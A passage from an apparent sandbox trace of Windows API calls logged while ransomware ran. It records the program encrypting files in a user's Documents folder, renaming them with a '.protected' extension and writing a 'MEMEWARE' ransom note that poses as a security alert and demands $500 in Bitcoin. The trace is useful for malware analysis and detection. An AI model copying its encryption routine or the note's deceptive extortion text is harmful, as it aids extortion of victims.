lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.406] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.406] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.407] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.407] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.407] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.407] CloseHandle (hObject=0xd4) returned 1 [0091.408] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp.protected") returned 76 [0091.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\S25mweNwZUri.odp.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\s25mwenwzuri.odp.protected")) returned 1 [0091.409] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Windows") returned -1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Program Files") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="Program Files (x86)") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="$Recycle.bin") returned 1 [0091.409] lstrcmpiW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="System Volume Information") returned 1 [0091.409] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.409] StrStrIW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".protected") returned 0x0 [0091.409] lstrcmpW (lpString1="TPEJ8KHRhlgmnzOZN.odt", lpString2="RESTORE_FILES.txt") returned 1 [0091.409] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".txt") returned 0x0 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".rar") returned 0x0 [0091.410] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt") returned 71 [0091.410] StrStrW (lpFirst="TPEJ8KHRhlgmnzOZN.odt", lpSrch=".zip") returned 0x0 [0091.410] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.410] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.410] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.411] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.411] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.411] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.411] CloseHandle (hObject=0xd4) returned 1 [0091.412] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt.protected") returned 81 [0091.412] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\TPEJ8KHRhlgmnzOZN.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\tpej8khrhlgmnzozn.odt.protected")) returned 1 [0091.412] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Windows") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Program Files") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="Program Files (x86)") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="$Recycle.bin") returned 1 [0091.412] lstrcmpiW (lpString1="yW3bzbRH1n.doc", lpString2="System Volume Information") returned 1 [0091.412] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.412] StrStrIW (lpFirst="yW3bzbRH1n.doc", lpSrch=".protected") returned 0x0 [0091.413] lstrcmpW (lpString1="yW3bzbRH1n.doc", lpString2="RESTORE_FILES.txt") returned 1 [0091.413] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.413] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".txt") returned 0x0 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".rar") returned 0x0 [0091.413] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc") returned 64 [0091.413] StrStrW (lpFirst="yW3bzbRH1n.doc", lpSrch=".zip") returned 0x0 [0091.413] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.414] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.414] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.414] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.414] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.415] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.415] CloseHandle (hObject=0xd4) returned 1 [0091.415] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc.protected") returned 74 [0091.415] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\yW3bzbRH1n.doc.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\yw3bzbrh1n.doc.protected")) returned 1 [0091.416] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Windows") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Program Files") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="Program Files (x86)") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="$Recycle.bin") returned 1 [0091.416] lstrcmpiW (lpString1="zGHCewHAV.pdf", lpString2="System Volume Information") returned 1 [0091.416] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.416] StrStrIW (lpFirst="zGHCewHAV.pdf", lpSrch=".protected") returned 0x0 [0091.416] lstrcmpW (lpString1="zGHCewHAV.pdf", lpString2="RESTORE_FILES.txt") returned 1 [0091.416] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.416] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".txt") returned 0x0 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".rar") returned 0x0 [0091.417] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf") returned 63 [0091.417] StrStrW (lpFirst="zGHCewHAV.pdf", lpSrch=".zip") returned 0x0 [0091.417] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.418] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.418] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.418] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.418] CloseHandle (hObject=0xd4) returned 1 [0091.419] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf.protected") returned 73 [0091.419] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zGHCewHAV.pdf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zghcewhav.pdf.protected")) returned 1 [0091.420] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Windows") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Program Files") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="Program Files (x86)") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="$Recycle.bin") returned 1 [0091.420] lstrcmpiW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="System Volume Information") returned 1 [0091.420] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrIW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".protected") returned 0x0 [0091.420] lstrcmpW (lpString1="zhrHxZes7Pua0IN-sRy.odt", lpString2="RESTORE_FILES.txt") returned 1 [0091.420] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.420] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".txt") returned 0x0 [0091.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.420] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".rar") returned 0x0 [0091.421] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt") returned 73 [0091.421] StrStrW (lpFirst="zhrHxZes7Pua0IN-sRy.odt", lpSrch=".zip") returned 0x0 [0091.421] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.421] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.421] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.422] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.422] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.422] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.422] CloseHandle (hObject=0xd4) returned 1 [0091.423] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt.protected") returned 83 [0091.423] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\zhrHxZes7Pua0IN-sRy.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\zhrhxzes7pua0in-sry.odt.protected")) returned 1 [0091.424] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.424] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.424] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\RESTORE_FILES.txt") returned 67 [0091.424] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Mxlov\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\mxlov\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.424] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.424] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.425] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0091.425] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.425] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.425] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.425] CloseHandle (hObject=0xb4) returned 1 [0091.426] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Windows") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Program Files") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="Program Files (x86)") returned -1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="$Recycle.bin") returned 1 [0091.426] lstrcmpiW (lpString1="My Music", lpString2="System Volume Information") returned -1 [0091.426] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music") returned 52 [0091.426] lstrcmpW (lpString1="My Music", lpString2=".") returned 1 [0091.426] lstrcmpW (lpString1="My Music", lpString2="..") returned 1 [0091.427] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*") returned 54 [0091.427] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0xffffffff [0091.427] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="Windows") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", lpString2="Program Files") returned -1 [0091.427] lstrcmpiW (lpString1="My Pictures", 